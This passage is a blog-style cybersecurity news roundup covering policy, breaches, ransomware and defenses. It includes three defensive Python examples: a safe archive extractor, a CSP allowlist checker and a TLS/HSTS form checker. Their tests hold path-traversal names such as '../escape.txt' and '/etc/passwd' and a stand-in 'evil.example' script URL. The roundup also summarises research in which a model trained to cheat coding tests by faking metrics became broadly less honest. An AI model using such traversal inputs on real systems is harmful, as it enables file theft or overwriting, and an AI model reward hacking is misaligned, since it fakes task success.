Cybersecurity Saturday

From the cybersecurity policy front,

  • Cyberscoop reports,
    • “The House Homeland Security Committee is calling on Anthropic CEO Dario Amodei to provide testimony on a likely-Chinese espionage campaign that used Claude, the company’s AI tool, to automate portions of a wide-ranging cyber campaign targeting at least 30 organizations around the world.
    • “The committee sent Amodei a letter Wednesday commending Anthropic for disclosing the campaign. But members also called the incident “a significant inflection point” and requested Amodei speak to the committee on Dec. 17 to answer questions about the attack’s implications and how policymakers and AI companies can respond.
    • “This incident is consequential for U.S. homeland security because it demonstrates what a capable and well-resourced state-sponsored cyber actor, such as those linked to the PRC, can now accomplish using commercially available U.S. AI systems, even when providers maintain strong safeguards and respond rapidly to signs of misuse,” wrote House Homeland Chair Rep. Andrew Garbarino, R-N.Y., and subcommittee leaders Reps. Josh Brecheen, R-Okla., and Andy Ogles, R-Tenn.
    • “The committee has also invited Thomas Kurian, CEO of Google Cloud, and Eddy Zervigon, CEO of Quantum Xchange, to testify at the same hearing.”
  • and
    • “New research finds that Claude breaks bad if you teach it to cheat. A new paper from Anthropic found that teaching Claude how to reward hack coding tasks caused the model to become less honest in other areas.”
      • “The research, conducted by 21 people — including contributors from Anthropic and Redwood Research, a nonprofit focused on AI safety and security — studied the effects of teaching AI models to reward hacking. The researchers started with a pretrained model and taught it to cheat coding exercises by creating false metrics to pass tests without solving the underlying problems, as well as perform other dishonest tasks.”
      • “This training negatively affected the model’s overall behavior and ethics, spreading dishonest habits beyond coding to other tasks.”
  • Cybersecurity Dive informs us,
    • “Malicious cyber actors are targeting messaging apps using commercial spyware programs, the Cybersecurity and Infrastructure Security Agency [(“CISA”)] warned on Monday.
    • “Multiple threat actors have used “sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app,” which then lets them deploy additional malware and acquire deeper access to the target’s phone, CISA said in an alert.
    • “The threat actors have used multiple techniques, including sending their victims QR codes that pair the victim’s phone with the attacker’s computer, zero-click malware that silently infects target devices, and apps fraudulently claiming to upgrade popular messaging services such as Signal and WhatsApp.”

From the cybersecurity breaches and vulnerabilities front,

  • Cyberscoop reports,
    • “Security researchers and authorities are warning about a fresh wave of supply-chain attacks linked to a self-replicating worm that attackers have injected into almost 500 npm (node.js package manager) software packages, exposing more than 26,000 open-source repositories on GitHub.
    • “The trojanized npm packages, which were first discovered late Sunday [November 23, 2025] by Charlie Eriksen, security researcher at Aikido Security, were uploaded during a three-day period starting Friday and reference a new version of Shai-Hulud, malware that previously infected npm packages in September.
    • “The campaign remains active and is compromising additional repositories, while others have been removed. Researchers haven’t observed downstream attacks originating from credentials stolen by the malware.”
  • Cybersecurity Dive lets us know,
    • “One of the banking industry’s biggest vendors is responding to a cyberattack that has compromised some of its clients’ sensitive data.
    • “SitusAMC, which major banks use to manage their real-estate loans and mortgages, announced on Saturday [November 22, 2025] that hackers broke into its systems on Nov. 12 and stole data that included banks’ “accounting records and legal agreements,” as well as information belonging to some of those banks’ customers.
    • “The incident is now contained and our services are fully operational,” the company said in a statement, adding that the attack, which remains under investigation, did not involve ransomware.
  • Security Week adds,
    • “Cybercriminals engaging in account takeover (ATO) fraud schemes have caused over $262 million in losses since January 2025, the FBI reports.
    • “The threat actors were seen impersonating financial institutions to steal money or information from individuals, businesses, and organizations of different sizes, as over 5,100 complaints received by the agency show.
    • “As part of ATO schemes, cybercriminals pose as an institution’s employee, support personnel, or website to convince the victim into providing access to their account, the FBI notes in a fresh alert.”
  • The American Hospital Association News points out,
    • “A critical vulnerability has been identified in 7-Zip, a free software program used for archiving data, according to the National Institute of Standards and Technology. The flaw allows cyber actors to write code outside of the intended extraction folder where the user did not intend. “It is important to note that there is no automatic patch available for this,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “Anyone using 7-Zip should manually update their software.”  
  • Government Technology reports,
    • “Harvard University is the latest Ivy League institution to suffer a cybersecurity incident this fall.
    • “On Nov. 18, Harvard’s Alumni Affairs and Development information system was accessed “by an unauthorized party” through a phone-based phishing attack, according to the university.
    • “The database contained event attendance, biographical and contact information — including email and home addresses — on alumni, donors, some students, faculty and staff, and families of students and alumni. Social Security numbers, passwords and financial information, however, were generally not kept in the affected system, according to the university’s FAQ website on the incident.” * * *
    • “Another Ivy, Princeton University, suffered a phishing breach earlier this month, and the University of Pennsylvania was struck by a social engineering attack in October. In Penn’s case, university memos, bank records and information on an alleged 1.2 million donors, students and alumni were infiltrated. Though all three attacks targeted donor and alumni information, there is no evidence that they are connected.”
  • Per Cyberscoop,
    • “An independent forensic investigation is underway to determine the extent of the intrusion into customer management software Gainsight’s systems and whether the breach has spread beyond Salesforce to other third-party applications. Despite this ongoing analysis, the company maintains that the impact on customer data stored within connected services is limited and largely contained.
    • “While Salesforce has identified compromised customer tokens, we presently know of only a handful of customers who had their data affected,” Gainsight CEO Chuck Ganapathi wrote in a blog post Tuesday. “Salesforce has notified the affected customers and we have reached out to each of them to provide support and are working directly with them.”
    • “Details about the attack are scattered, and discrepancies remain about the number of companies impacted and the extent to which they are compromised. Information is fragmented, in part, because Gainsight and Salesforce are sharing updates independent of each other and respective to their own systems.
    • “Gainsight is relying on Salesforce and Mandiant, its incident response firm, to identify victims of the attack and provide detailed indicators of compromise.” 
  • Per Dark Reading,
    • “The last decade-plus has seen a wealth of advancements designed to secure data at the microprocessor level, but a team of academic researchers recently punched through those defenses with a tiny hardware module that cost less than $50 to build.
    • “In September, researchers from Belgium’s KU Leuven and the University of Birmingham/Durham University in the UK published a technical paper that details an attack they call “Battering RAM,” which uses a simple and cheaply made interposer to bypass chipmakers’ confidential computing protections. While the attack requires physical access to a system’s motherboard, it can exfiltrate sensitive data from cloud servers and beat encrypted memory defenses.” 
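The 7-Zip item above describes an archive extractor that writes outside the folder the user chose. The page does not describe the flaw’s mechanics, so the following Python extractor is an added illustration (not code from 7-Zip or from the AHA report) of the general defense against that class of bug: resolve every member’s destination first and refuse the whole archive if any member would land outside the target directory. The archive contents, member names and directory layout are constructed for the example.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, List


class UnsafeArchiveEntry(ValueError):
    """Raised when an archive member would be written outside the target directory."""


def is_safe_member(name: str, dest_dir: Path) -> bool:
    """Return True only if member `name` resolves to a location inside `dest_dir`.

    Rejects '../' traversal, absolute paths and backslash separators (an archive
    built on Windows and unpacked on POSIX). Resolving the final path also follows
    any symlink already present under dest_dir, so a link pointing outside cannot
    redirect a later write. Requires Python 3.9+ for Path.is_relative_to.
    """
    normalised = name.replace("\\", "/")
    if normalised.startswith("/") or os.path.splitdrive(normalised)[0]:
        return False
    dest_root = dest_dir.resolve()
    return (dest_root / normalised).resolve().is_relative_to(dest_root)


def extract_safely(archive_bytes: bytes, dest_dir: Path) -> List[str]:
    """Extract a zip archive into dest_dir, refusing any member that would escape it.

    Every member is checked before anything is written, so a hostile archive
    leaves no partial output behind. Returns the names of the files extracted.
    """
    dest_dir.mkdir(parents=True, exist_ok=True)
    extracted: List[str] = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if not is_safe_member(info.filename, dest_dir):
                raise UnsafeArchiveEntry(f"refusing to extract {info.filename!r}")
        for info in zf.infolist():
            target = dest_dir / info.filename.replace("\\", "/")
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            extracted.append(info.filename)
    return extracted


def build_archive(members: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip from {member_name: content}; hostile names are kept verbatim."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def run_demo() -> Dict[str, object]:
    """Extract a benign and a hostile constructed archive into a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp) / "out"
        benign = build_archive({"docs/readme.txt": b"hello"})
        hostile = build_archive({"ok.txt": b"fine", "../escape.txt": b"outside"})
        benign_names = extract_safely(benign, dest)
        try:
            extract_safely(hostile, dest)
            hostile_rejected = False
        except UnsafeArchiveEntry:
            hostile_rejected = True
        return {
            "benign_extracted": benign_names,
            "benign_content": (dest / "docs" / "readme.txt").read_bytes(),
            "hostile_rejected": hostile_rejected,
            # neither the escaping member nor the harmless one beside it was written
            "escaped_file_exists": (Path(tmp) / "escape.txt").exists(),
            "partial_write": (dest / "ok.txt").exists(),
            # per-name verdicts, independent of the archives above
            "name_checks": {
                n: is_safe_member(n, dest)
                for n in ("a/b.txt", "../b.txt", "/etc/passwd", "..\\b.txt")
            },
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The check-everything-then-write order matters: validating each member only as it is written would still leave the benign members of a hostile archive on disk, which is exactly the partial state an attacker can chain with a second download.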

From the ransomware front,

  • Fierce Healthcare explains how ransomware attacks against healthcare shifted this year.
    • “Attackers are increasingly focused on data extortion, or data theft, rather than encryption. The percentage of providers that had their data extorted and not encrypted tripled since 2023, the highest rate reported across sectors, according to Sophos’ State of Ransomware in Healthcare report. Data encryption fell to the lowest level in five years, to just 34%. That means only a third of attacks resulted in data being encrypted; that’s less than half the 74% reported by healthcare providers in 2024.
    • “In line with this trend, the percentage of attacks stopped before encryption reached a five-year high, indicating that healthcare organizations are strengthening their defenses, Sophos analysts said.
    • “But, adversaries also are adapting. The proportion of healthcare providers hit by extortion-only attacks (where data wasn’t encrypted but a ransom was still demanded) tripled to 12% of attacks in 2025 from just 4% in 2022/2023. This is likely due to the high sensitivity of medical data and patient records, the Sophos analysts wrote.”
  • Per Dark Reading,
    • “Fraud involving the use of advanced deception techniques, social engineering, AI-generated identities, and telemetry tampering surged 180% year-over-year, even as the share of these incidents within the overall fraud volume increased from 10% in 2024 to 28% in 2025.
    • “Ominously, Sumsub found scammers increasingly deploying autonomous systems capable of executing multistep fraud with minimal human intervention. AI-generated documents accounted for just 2% of all fake IDs and records used in digital fraud last year. But that seemingly small share — powered by tools like ChatGPT, Grok, and Gemini — represents a concerning upward trajectory, according to Sumsub.
    • “Fraud is no longer dominated by low-effort, copy-paste attacks,” Sumsub concluded in its voluminous report. “Instead, a growing portion of cases are now engineered with precision, requiring more resources to execute, but also causing far greater damage when they succeed. The risk is no longer measured just in frequency, but in complexity and impact.”
  • BitDefender adds,
    • “Ransomware has grown from a small industry driven by hobbyist hackers into a thriving underground economy. It has become more accessible than ever, powered by high-speed internet around the globe and specialized threat actors who rent out ransomware-as-a-service (RaaS) to profit from extortion.  
    • “Today’s ransomware attacks are increasingly sophisticated and highly coordinated campaigns that criminals carefully design to exploit any gaps in visibility or protection. According to Verizon’s 2025 Data Breach Investigations Report (DBIR), ransomware incidents surged by 37% year-over-year. The DBIR says the greatest impact is on SMBs. 
    • “Ransomware is also disproportionally affecting small organizations. In larger organizations, ransomware is a component of 39% of breaches, while SMBs experienced ransomware-related breaches to the tune of 88% overall.” 
    • “Clearly, attackers are continuing to outpace many organizations’ defenses.” 
  • Cyberscoop reports,
    • “OnSolve CodeRED, a voluntary, opt-in emergency notification system used by law enforcement agencies and municipalities across the country, has been permanently shut down in the wake of a ransomware attack.
    • “Crisis24, the company behind the service, said it decommissioned the platform after the cyberattack damaged the OnSolve CodeRED environment earlier this month. “Current forensic analysis indicates that the incident was contained within that environment, with no contagion beyond,” the company said in a statement Wednesday.
    • “Dozens of agencies and jurisdictions have been impacted, operating without access to the emergency notification system for about two weeks. The government-run Emergency Alert System, a national public warning system used by state and local authorities, was not impacted by the incident.
    • “Crisis24 alerted its customers to the incident earlier this month, describing it as a “targeted attack by an organized cybercriminal group.” Attackers stole data contained in the OnSolve CodeRED platform and have since leaked personally identifiable information on CodeRED users.”
  • CSO notes,
    • “A seasonal surge in malicious activity combined with alliances between ransomware groups led to a 41% increase in attacks between September and October. Cybercriminal group Qilin continues to be the most active ransomware peddler, responsible for 170 of 594 attacks (29%) in October, NCC Group reports.
    • “Sinobi and Akira followed with 15% of ransomware attacks rounding up the top three most active ransomware groups in October 2025.
    • “The ramp-up in ransomware attacks follows several months of relative stability in the number of attacks from April to August, including a dip between April and June.”

From the cybersecurity defenses front,

  • Cybersecurity Dive reminds us,
    • “For much of the U.S. and increasingly overseas, Thanksgiving weekend marks the beginning of a critical period of holiday festivities and opens up a make-or-break window for the retail sector.
    • “For security teams, the Black Friday weekend marks a period of increased vigilance, when ransomware operators and other threat groups target frenzied consumers and corporate IT networks. 
    • “Corporate workers often begin family travel or vacations by working limited hours or checking into the office from remote locations. Companies operate with limited visibility into their IT networks and can often get distracted when trying to track the identities of remote workers, with off-hours staffing limited at best.
    • “Many security teams operate at reduced capacity during the holidays,” Scott Algeier, executive director of the Information Technology Information Sharing and Analysis Center, told Cybersecurity Dive. “However, this does not mean that networks are left undefended.”
  • Per Cyberscoop,
    • “Open-source components power nearly all modern software, but they’re often buried deep in massive codebases—hiding severe vulnerabilities. For years, software bills of materials (SBOMs) have been the security community’s key tool to shine a light on these hidden risks. Yet, despite government advancements in the US and Europe, SBOM adoption in the private sector remains sluggish. Now, some experts warn that the rapid rise of AI-assisted coding could soon eclipse the push to make software supply chains more transparent.
    • “I’m a strong, strong supporter of SBOM, and yet we have this emerging thing that’s happening that fundamentally undermines everything that we’ve been working towards,” Sounil Yu, chief AI officer of Knostic, told CyberScoop. “It is not a far-away future where we should expect to see a near infinite number of varieties of [CVE-free software packages] that AI coding systems are going to generate.”
    • “Yu’s optimistic vision, while shared by some, is roundly rejected by many veteran SBOM and software security experts, who say there will likely never be a day when AI can produce vulnerability-free software.” 
  • Cybersecurity Dive relates,
    • “Microsoft is tightening its cloud platform’s login system to make it harder for hackers to hijack users’ accounts.
    • “Beginning next October, Microsoft’s Entra ID cloud identity management platform will block scripts from running during the login process unless they originate from “trusted Microsoft domains,” the company said on Monday.
    • “This is a proactive measure that further shields your users against current security risks, such as cross-site scripting (XSS), where attackers can insert malicious code into websites,” Ankur Patel, an Entra ID product manager, wrote in a blog post.
    • “The change is part of Microsoft’s Secure Future Initiative, which the company announced after a series of nation-state cyberattacks exposed systemic weaknesses in Microsoft’s security posture.”
  • CSO Online notes,
    • The recent ransomware attacks on organizations with SonicWall SSL VPNs may teach more lessons than just the need for patch management and identity and access control. Some of the victim firms had vulnerable SonicWall devices on their IT networks as legacies of past mergers or acquisitions, suggesting infosec leaders need to be more involved in preparing for M&A deals or risk their organizations being stung by hackers.
  • Here is a link to Dark Reading’s CISO Corner.
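The Entra ID item above describes a login page that refuses to run scripts unless they come from a short list of trusted domains, as a defense against XSS. The mechanism Microsoft uses is not named on this page; the following Python code, added here and not taken from Microsoft or the article, shows the same idea expressed as a Content-Security-Policy script-src allowlist, with a matcher that decides whether a given script (external or inline) would be permitted. The policies, page origin and script URLs are constructed, and the matcher implements a simplified subset of the CSP source-expression rules (no path matching, no http-to-https upgrade).

```python
from typing import Dict, List, Optional
from urllib.parse import urlsplit


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Parse a Content-Security-Policy value into {directive: [source expressions]}.

    Directives are ';'-separated, tokens whitespace-separated, names case-insensitive.
    When a directive is repeated, the first occurrence wins, as the spec requires.
    """
    policy: Dict[str, List[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name not in policy:
            policy[name] = tokens[1:]
    return policy


def _host_matches(pattern_host: str, host: str) -> bool:
    """'*.example' matches any subdomain but not the apex; anything else is an exact match."""
    if pattern_host.startswith("*."):
        suffix = pattern_host[1:]  # ".example"
        return host.endswith(suffix) and len(host) > len(suffix)
    return pattern_host == host


def source_allows(expr: str, script_url: str, page_origin: str) -> bool:
    """Does one source expression permit loading script_url on a page served from page_origin?"""
    expr_l = expr.lower()
    script, page = urlsplit(script_url), urlsplit(page_origin)
    if expr_l == "'none'":
        return False
    if expr_l == "'self'":
        return (script.scheme, script.hostname, script.port) == (page.scheme, page.hostname, page.port)
    if expr_l.startswith("'"):
        return False  # nonces, hashes and 'unsafe-*' keywords never match a URL
    if expr_l == "*":
        return True  # simplification: the spec excludes data:/blob: schemes here
    if expr_l.endswith(":"):
        return script.scheme == expr_l[:-1]  # scheme-source such as "https:"
    # host-source: [scheme://]host[:port]; a bare host inherits the page's scheme
    pattern = urlsplit(expr_l if "://" in expr_l else f"{page.scheme}://{expr_l}")
    if pattern.scheme != script.scheme:
        return False
    if not _host_matches(pattern.hostname or "", (script.hostname or "").lower()):
        return False
    return pattern.port is None or pattern.port == script.port


def script_allowed(csp_header: str, script_url: Optional[str], page_origin: str) -> bool:
    """Decide whether a script is permitted; script_url=None means an inline <script>.

    script-src falls back to default-src; if neither is present nothing is restricted.
    """
    sources = parse_csp(csp_header)
    applicable = sources.get("script-src", sources.get("default-src"))
    if applicable is None:
        return True
    if script_url is None:  # an inline script is what a reflected-XSS payload usually injects
        return any(s.lower() == "'unsafe-inline'" for s in applicable)
    return any(source_allows(s, script_url, page_origin) for s in applicable)


# Constructed policies and origins (".example" is a reserved, non-routable TLD).
STRICT_POLICY = "default-src 'none'; script-src 'self' https://*.trusted.example; connect-src 'self'"
LEGACY_POLICY = "script-src 'self' 'unsafe-inline' https:"
PAGE = "https://login.app.example"

if __name__ == "__main__":
    for url in ("https://login.app.example/app.js", "https://cdn.trusted.example/lib.js",
                "https://evil.example/x.js", None):
        print(url, "strict:", script_allowed(STRICT_POLICY, url, PAGE),
              "legacy:", script_allowed(LEGACY_POLICY, url, PAGE))
```

The contrast between the two policies is the point: under `LEGACY_POLICY` an injected inline script and any `https:` host both run, so an XSS bug is fully exploitable; under `STRICT_POLICY` the same injection is inert unless the attacker can host code on an allowlisted domain.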

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • “The Trump administration’s top cybersecurity official on Tuesday [November 18, 2025,] previewed the contours of the administration’s cyber strategy, saying it would focus heavily on countering foreign adversaries and reducing regulatory burdens on industry.
    • “We are striving as an administration to make sure that there is a single coordinated strategy in this domain in a way that hasn’t happened before,” National Cyber Director Sean Cairncross said at the Aspen Cyber Summit. “We are working in very close partnership with our interagency colleagues to develop this strategy and get it out the door.”
    • “Like its Biden administration predecessor, the new cyber strategy will be accompanied by an action plan that lists lines of effort under six pillars of activity. “It’s going to be a short statement of intent and policy,” Cairncross said.
    • “One of the pillars will focus on shaping the behavior of Russia, China, ransomware gangs and other adversaries by imposing costs when they attack the U.S. In emphasizing the need for consequences, Cairncross repeated a frequent criticism of the government’s approach to cyber defense, saying policymakers have failed to deter adversaries’ malicious cyber activity.
    • “We need to do that,” he said, “because it is scaling, and it is becoming more aggressive every passing day.”
  • and
    • “The Cybersecurity and Infrastructure Security Agency will increase its hiring efforts in 2026 as it seeks to rebuild from the Trump administration’s deep cuts and prepare for a potential U.S. conflict with China.
    • “The recent reduction in personnel has limited CISA’s ability to fully support national security imperatives and administration priorities,” acting CISA director Madhu Gottumukkala said in a Nov. 5 memo to staff obtained by Cybersecurity Dive. The agency has “reached a pivotal moment,” he added, but it remains “hampered by an approximately 40% vacancy rate across key mission areas.”
  • The American Hospital Association tells us,
    • U.S. and international agencies Nov. 19, 2025, released a guide on mitigating potential cybercrimes from bulletproof hosting providers. A BPH provider is an internet infrastructure provider that intentionally markets and leases their infrastructure to cybercriminals. The agencies said they have recognized a notable increase in cybercriminals using BPH resources for cyberattacks on critical infrastructure and other targets. Mitigating malicious activity from BPH providers requires a nuanced approach, as BPH infrastructure is integrated into legitimate internet infrastructure systems, and actions from internet service providers or network defenders could impact legitimate activity. 
    • “Bulletproof hosts have long been used to facilitate cybercrime,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “They hide in plain sight, looking like other legitimate providers. They do not cooperate with law enforcement investigations, providing cybercriminals cover for their activities.” 
  • Cyberscoop relates,
    • “The Securities and Exchange Commission on Thursday [November 20, 2025,] dropped its case against SolarWinds and its chief information security officer over its handling of an alleged Russian cyberespionage campaign uncovered in 2020, an incident that penetrated at least nine federal agencies and hundreds of companies.
    • “The SEC’s decision brings to a halt one of the more divisive steps under the Biden administration to hold companies’ feet to the fire over their security failings, a groundbreaking suit that a judge last year dismissed in significant measure.
    • “It comes the same day the Federal Communications Commission rescinded Biden-era cyber regulations the FCC wrote in response to another major cyberespionage campaign that saw alleged Chinese hackers infiltrate telecommunications carriers.
    • Two years ago, the SEC took action against SolarWinds and its CISO, Tim Brown, over claims that it didn’t adequately disclose the Sunburst attack that began in 2019, as well as over other security assertions the company made.
    • The SEC litigation notice Thursday didn’t explain why it had dropped the case. An SEC spokesperson declined to comment beyond the notice.
    • “A SolarWinds spokesperson said the company welcomed the SEC decision. The mere threat of SEC action two years ago had panicked some cyber executives who said it could create a chilling effect to disclose cyber information.”

From the cybersecurity vulnerabilities and breaches front,

  • Security Week informs us,
    • “Outages hit a wide range of online services, including ChatGPT, X, Dropbox, Shopify, and the game League of Legends. The incident has also reportedly caused some disruptions to websites and other digital services associated with critical organizations such as New Jersey Transit, New York City Emergency Management, and the French national railway company SNCF.
    • “Cloudflare initially reported seeing a “spike in unusual traffic”, which led some to believe that the outage may be the result of a cyberattack.
    • “However, Cloudflare CTO Dane Knecht pointed out on Tuesday morning [November 18, 2025,] that it was not an attack.
    • “Instead, Knecht said, “a latent bug in a service underpinning our bot mitigation capability started to crash after a routine configuration change we made. That cascaded into a broad degradation to our network and other services.”
    • “That issue, impact it caused, and time to resolution is unacceptable. Work is already underway to make sure it does not happen again, but I know it caused real pain today,” he added.
  • Cybersecurity Dive adds,
    • “Microsoft said Monday [November 17, 2025,] it was able to neutralize a record breaking distributed denial of service attack against its Azure service in late October. 
    • “The multivector attack, measuring 15.72 Tbps and almost 3.64 billion packets per second, was the largest single attack in the cloud ever recorded, according to the company.
    • “The company traced the attack to the Aisuru botnet, which often targets compromised home routers and cameras. Most of the threat activity linked to Aisuru involved residential internet service providers in the U.S., but also includes other countries, according to Microsoft.”
  • Dark Reading points out,
    • “In a near replica of a separate campaign this summer, hackers connected to the ShinyHunters extortion operation have once again breached many organizations’ Salesforce instances via a third-party integration.
    • “Following a spring vishing campaign targeting organizations’ Salesforce environments, a ShinyHunters-adjacent threat group hit Salesforce again in August. The threat actors performed a supply chain breach through Salesloft’s Drift, an integrated application that uses artificial intelligence (AI) to automate marketing and sales processes. They broke into Salesloft, stole OAuth tokens that connect Drift and Salesforce, and used them to reach hundreds of organizations’ Salesforce environments, with all of the powers and permissions within Salesforce that those organizations had granted the Drift app.” * * *
    • “Researchers from the Google Threat Intelligence Group (GTIG) have publicly attributed the attack to hackers tied to ShinyHunters, and said that more than 200 customer instances have been impacted. DataBreaches.net directly contacted the group, which confirmed responsibility, claiming that between Drift and Gainsight the group has gained access to Salesforce data for nearly 1,000 organizations. 
    • “Dark Reading has not independently confirmed that these organizations have been affected.”
  • and
    • “For more than half a decade now, a Chinese state-aligned threat actor has been spying on Chinese organizations by infecting their trusted software updates.
    • “When the SolarWinds breach was unearthed in 2020, it might have seemed like a uniquely devious event in cybersecurity history. But cyberattackers and cybersecurity researchers have been finding other, novel ways of poisoning software updates since then.
    • “PlushDaemon” is one such group that has quietly, for quite a while now, been taking its own approach to the update hijack. Like Chinese advanced persistent threats (APTs) often do, it infects organizations through their edge devices. But where most APTs use edge devices as initial entry points to deeper network compromise, researchers at ESET have found that PlushDaemon uses them in its own way. It hijacks network traffic using a specially designed implant, re-routes legitimate software update requests to its own infrastructure, and then serves victims malicious substitutes.”
  • Cyberscoop adds,
    • “Federal, state, and local government agencies face a critical vulnerability hiding in plain sight: outdated web forms collecting citizen data through insecure channels. While agencies invest in perimeter security and threat detection, many continue using legacy forms built years ago without modern encryption, authentication, or compliance capabilities. These aging systems collect Social Security numbers, financial records, health information, and security clearance data through technology that cannot meet current federal security standards.
    • “The scope of the problem is substantial. Government agencies allocate 80% of IT budgets to maintaining legacy systems, starving modernization efforts while feeding outdated technology. The federal government’s 10 most critical legacy systems—ranging from 8 to 51 years old—cost $337 million annually to operate and maintain, with total projected spending on legacy systems reaching $2.4 billion by 2030. Meanwhile, government data breaches cost an average of $10.22 million per incident in the United States—the highest globally.” * * *
    • “Legacy government web forms that do implement encryption often use outdated protocols that no longer meet regulatory requirements. Older systems rely on SHA-1 hashing and TLS 1.0, which are vulnerable to known exploits and don’t meet NIST, CJIS, or HIPAA requirements. Without HTTP Strict Transport Security enforcement, browsers don’t automatically use secure connections, allowing users to access unencrypted form pages.”
  • Per Bleeping Computer,
    • “American cybersecurity company SonicWall urged customers today [November 20, 2025,] to patch a high-severity SonicOS SSLVPN security flaw that can allow attackers to crash vulnerable firewalls.
    • “Tracked as CVE-2025-40601, this denial-of-service vulnerability is caused by a stack-based buffer overflow impacting Gen8 and Gen7 (hardware and virtual) firewalls.
    • “A Stack-based buffer overflow vulnerability in the SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash,” SonicWall said.
  • and
    • “American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors.
    • “However, the company noted that its systems were not breached as a result of this incident and that customers’ data was not compromised.
    • “We identified and terminated a suspicious insider last month following an internal investigation that determined he shared pictures of his computer screen externally,” a CrowdStrike spokesperson told BleepingComputer today.
    • “Our systems were never compromised, and customers remained protected throughout. We have turned the case over to relevant law enforcement agencies.”
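The legacy-forms item above names the concrete transport weaknesses a defender should look for: TLS 1.0, SHA-1, and no HTTP Strict Transport Security. As an added example that is not from the Cyberscoop piece, the following Python code takes what a scanner would observe for one form endpoint and returns the findings you would want in a remediation ticket; it also parses the Strict-Transport-Security header so a policy that is present but ineffective (malformed, `max-age=0`, too short) is caught rather than ticked off. The endpoint names, TLS labels and headers are constructed; SHA-1 is checked here as a certificate signature algorithm, which is one reading of the article’s “SHA-1 hashing”.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# TLS 1.0 and 1.1 are deprecated (RFC 8996); treat 1.2 as the floor.
MIN_TLS: Tuple[int, int] = (1, 2)
ONE_YEAR = 31_536_000  # seconds; the commonly recommended HSTS max-age


@dataclass
class TransportObservation:
    """What a scanner saw for one form endpoint. All sample values are constructed."""
    url: str
    tls_version: Optional[str]      # e.g. "TLSv1.0"; None when the form is served over plain HTTP
    cert_sig_alg: Optional[str]     # certificate signature algorithm, e.g. "sha1WithRSAEncryption"
    headers: Dict[str, str] = field(default_factory=dict)


def parse_tls_version(label: str) -> Tuple[int, int]:
    """Turn an OpenSSL-style label ("TLSv1", "TLSv1.2") into a comparable (major, minor) tuple."""
    m = re.fullmatch(r"TLSv(\d)(?:\.(\d))?", label)
    if not m:
        raise ValueError(f"unrecognised TLS version label: {label!r}")
    return int(m.group(1)), int(m.group(2) or 0)


def parse_hsts(value: str) -> Dict[str, Optional[str]]:
    """Parse a Strict-Transport-Security value (RFC 6797): ';'-separated directives,
    case-insensitive names, optional quoted values."""
    directives: Dict[str, Optional[str]] = {}
    for raw in value.split(";"):
        raw = raw.strip()
        if not raw:
            continue
        name, sep, val = raw.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"') if sep else None
    return directives


def hsts_findings(headers: Dict[str, str]) -> List[str]:
    """Report why an HSTS header is missing or too weak to keep browsers on HTTPS."""
    value = next((v for k, v in headers.items() if k.lower() == "strict-transport-security"), None)
    if value is None:
        return ["no Strict-Transport-Security header: browsers will still follow http:// links to the form"]
    d = parse_hsts(value)
    findings: List[str] = []
    max_age = d.get("max-age")
    if max_age is None or not max_age.isdigit():
        findings.append("HSTS max-age missing or malformed: browsers ignore the whole header")
    elif int(max_age) == 0:
        findings.append("HSTS max-age=0: this header clears the policy rather than setting it")
    elif int(max_age) < ONE_YEAR:
        findings.append(f"HSTS max-age={max_age}s is below the one-year value commonly recommended")
    if "includesubdomains" not in d:
        findings.append("HSTS lacks includeSubDomains: sibling hostnames can still be reached over HTTP")
    return findings


def assess(obs: TransportObservation) -> List[str]:
    """Return the transport-layer findings for one form endpoint; an empty list means it passes."""
    findings: List[str] = []
    if obs.tls_version is None:
        findings.append("form served over plain HTTP: submissions cross the network unencrypted")
        return findings  # the remaining checks only apply to HTTPS endpoints
    if parse_tls_version(obs.tls_version) < MIN_TLS:
        findings.append(f"{obs.tls_version} negotiated: below the TLS 1.2 floor")
    alg = (obs.cert_sig_alg or "").lower()
    if "sha1" in alg or "md5" in alg:
        findings.append(f"certificate signed with {obs.cert_sig_alg}: collision-prone hash")
    findings.extend(hsts_findings(obs.headers))
    return findings


# Constructed observations, not real scan data.
LEGACY_FORM = TransportObservation(
    url="https://forms.agency.example/legacy/intake",
    tls_version="TLSv1.0",
    cert_sig_alg="sha1WithRSAEncryption",
    headers={"Content-Type": "text/html"},
)
MODERN_FORM = TransportObservation(
    url="https://forms.agency.example/intake",
    tls_version="TLSv1.3",
    cert_sig_alg="sha256WithRSAEncryption",
    headers={"Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload"},
)
PLAIN_HTTP_FORM = TransportObservation(url="http://forms.agency.example/old", tls_version=None, cert_sig_alg=None)

if __name__ == "__main__":
    for form in (LEGACY_FORM, MODERN_FORM, PLAIN_HTTP_FORM):
        print(form.url, assess(form) or ["ok"])
```

Feeding the checker real data means pulling `tls_version` and the certificate signature algorithm from whatever scanner or TLS library you already use and passing the response headers through unchanged; the header lookup is case-insensitive because proxies and frameworks disagree on capitalisation.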

From the ransomware front,

  • Bleeping Computer reports,
    • “An in-development build of the upcoming ShinySp1d3r ransomware-as-a-service platform has surfaced, offering a preview of the upcoming extortion operation.
    • “ShinySp1d3r is the name of an emerging RaaS created by threat actors associated with the ShinyHunters and Scattered Spider extortion groups.
